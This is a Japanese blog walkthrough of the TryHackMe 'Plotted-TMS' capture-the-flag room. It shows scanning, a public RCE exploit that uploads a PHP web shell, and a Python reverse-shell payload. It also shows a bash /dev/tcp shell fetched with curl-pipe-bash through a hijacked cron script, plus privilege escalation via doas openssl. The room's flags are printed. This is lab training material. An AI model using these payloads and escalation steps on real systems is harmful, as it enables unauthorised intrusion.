1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【TryHackMe】Plotted-TMS:Walkthrough

Posted at

概要

TryHackMe「Plotted-TMS」のWalkthroughです。

Task1

Q1.What is user.txt?

ポートスキャンを実行します。

$ nmap -Pn -T4 -sVC -A -p- 10.10.40.74 -oN nmap_result
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a3:6a:9c:b1:12:60:b2:72:13:09:84:cc:38:73:44:4f (RSA)
|   256 b9:3f:84:00:f4:d1:fd:c8:e7:8d:98:03:38:74:a1:4d (ECDSA)
|_  256 d0:86:51:60:69:46:b2:e1:39:43:90:97:a6:af:96:93 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ポートの稼働状況が分かりました。

ポート サービス バージョン
22 ssh OpenSSH 8.2p1
80 http Apache httpd 2.4.41
445 http Apache httpd 2.4.41

445ポートのディレクトリスキャンをします。

$ dirsearch -u http://10.10.40.74:445
[09:10:32] 301 -  320B  - /management  ->  http://10.10.40.74:445/management/
[09:10:32] 200 -    4KB - /management/

$ dirsearch -u http://10.10.40.74:445/management
[09:12:19] 200 -  166B  - /management/404.html
[09:12:22] 200 -  583B  - /management/about.html
[09:12:25] 301 -  326B  - /management/admin  ->  http://10.10.40.74:445/management/admin/
[09:12:27] 200 -    5KB - /management/admin/
[09:12:28] 200 -    5KB - /management/admin/index.php
[09:12:28] 200 -    2KB - /management/admin/login.php
[09:12:44] 301 -  327B  - /management/assets  ->  http://10.10.40.74:445/management/assets/
[09:12:44] 200 -  463B  - /management/assets/
[09:12:48] 301 -  326B  - /management/build  ->  http://10.10.40.74:445/management/build/
[09:12:49] 200 -  484B  - /management/build/
[09:12:51] 301 -  328B  - /management/classes  ->  http://10.10.40.74:445/management/classes/
[09:12:52] 200 -  541B  - /management/classes/
[09:12:53] 200 -    0B  - /management/config.php
[09:12:58] 301 -  329B  - /management/database  ->  http://10.10.40.74:445/management/database/
[09:12:58] 200 -  478B  - /management/database/
[09:13:00] 200 -  471B  - /management/dist/
[09:13:00] 301 -  325B  - /management/dist  ->  http://10.10.40.74:445/management/dist/
[09:13:13] 301 -  324B  - /management/inc  ->  http://10.10.40.74:445/management/inc/
[09:13:13] 200 -  500B  - /management/inc/
[09:13:19] 301 -  325B  - /management/libs  ->  http://10.10.40.74:445/management/libs/
[09:13:31] 301 -  326B  - /management/pages  ->  http://10.10.40.74:445/management/pages/
[09:13:31] 200 -  497B  - /management/pages/
[09:13:37] 301 -  328B  - /management/plugins  ->  http://10.10.40.74:445/management/plugins/
[09:13:37] 200 -    1KB - /management/plugins/
[09:13:59] 301 -  328B  - /management/uploads  ->  http://10.10.40.74:445/management/uploads/
[09:13:59] 200 -  574B  - /management/uploads/

/managementディレクトリが見つかりました。
アクセスします。

manage.jpg

ログインページにアクセスします。

login form.jpg

Traffic Offense Management Systemで検索すると1.0でのRCE exploitが見つかりました。

PoCを実行します。

$ python2.7 exploit.py                                       

Example: http://example.com

Url: http://10.10.40.74:445/management
Check Url ...

[+] Bypass Login

[+] Upload Shell

[+] Exploit Done!

$ whoami
Traceback (most recent call last):
  File "exploit.py", line 58, in <module>
    request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 119, in post
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 61, in request
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 516, in request
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 459, in prepare_request
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 314, in prepare
  File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 388, in prepare_url
requests.exceptions.MissingSchema: Invalid URL '/management/uploads/1727616060_evil.php?cmd=whoami': No schema supplied. Perhaps you meant http:///management/uploads/1727616060_evil.php?cmd=whoami?

シェルを張れましたが、requestsライブラリのエラーでコマンドを実行できませんでした。
しかし、RCEのアップロードファイルはエラー文から分かったので、cmdパラメータにリバースシェルのペイロードを付けてリクエストを送信します。

http://10.10.40.74:445/management/uploads/1727616060_evil.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.6.55.144%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27

Netcatでリッスンしているとリバースシェルを張れました。

$ nc -lvnp 1234                                       
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.40.74] 33014
$ whoami
whoami
www-data

plot_adminへの権限昇格を目指します。

$ ls -la /home
ls -la
total 16
drwxr-xr-x  4 root       root       4096 Oct 28  2021 .
drwxr-xr-x 20 root       root       4096 Oct 25  2021 ..
drwxr-xr-x  4 plot_admin plot_admin 4096 Oct 28  2021 plot_admin
drwxr-xr-x  4 ubuntu     ubuntu     4096 Oct 28  2021 ubuntu

/etc/crontabを確認するとplot_adminアカウントでスクリプトが実行されるように設定されています。

$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   plot_admin /var/www/scripts/backup.sh
#

/var/www/scripts/backup.shを確認するとバックアップを取る処理が実行されています。

$ cat /var/www/scripts/backup.sh
cat /var/www/scripts/backup.sh
#!/bin/bash

/usr/bin/rsync -a /var/www/html/management /home/plot_admin/tms_backup
/bin/chmod -R 770 /home/plot_admin/tms_backup/management

/var/www/scriptsディレクトリはwww-dataアカウントがフルコントロールできます。

$ ls -la /var/www
ls -la /var/www
total 16
drwxr-xr-x  4 root     root     4096 Oct 28  2021 .
drwxr-xr-x 14 root     root     4096 Oct 28  2021 ..
drwxr-xr-x  4 root     root     4096 Oct 28  2021 html
drwxr-xr-x  2 www-data www-data 4096 Oct 28  2021 scripts

/var/www/scripts/backup.shを別ファイル名にします。

$ mv backup.sh backup.sh.org

Kaliでリバースシェルのペイロードファイルを作成します。

shell.sh
#!/bin/bash

bash -i >& /dev/tcp/10.6.55.144/1234 0>&1

httpサーバーを起動します。

$ python -m http.server 80

ターゲットマシン上にbackup.shとして、作成したリバースシェルファイルを設置します。

www-data@plotted:/var/www/scripts$ echo "curl http://10.6.55.144/shell.sh|bash" > backup.sh

Netcatでリッスンしているとplot_adminとしてシェルを張れました。

$ nc -lvnp 12345
listening on [any] 12345 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.40.74] 55188
bash: cannot set terminal process group (31784): Inappropriate ioctl for device
bash: no job control in this shell
plot_admin@plotted:~$ whoami
whoami
plot_admin

TTYの設定をします。

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

/home/plot_admin/user.txtからルートフラグを入手できます。

/home/plot_admin/user.txt
77927510d5edacea1f9e86602f1fbadb

A.77927510d5edacea1f9e86602f1fbadb

Q2.What is root.txt?

linpeasを実行します。

./linpeas

doas.confがピックアップされました。

╔══════════╣ Checking doas.conf
permit nopass plot_admin as root cmd openssl

opensslがルート権限で実行できるようなのでGTFOBinsで検索します。

file-readのテクニックを利用してルートフラグを入手できます。

$ LFILE=/root/root.txt
$ /usr/bin/doas openssl enc -in "$LFILE"
Congratulations on completing this room!

53f85e2da3e874426fa059040a9bdcab

Hope you enjoyed the journey!

Do let me know if you have any ideas/suggestions for future rooms.
-sa.infinity8888

A.53f85e2da3e874426fa059040a9bdcab

1
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?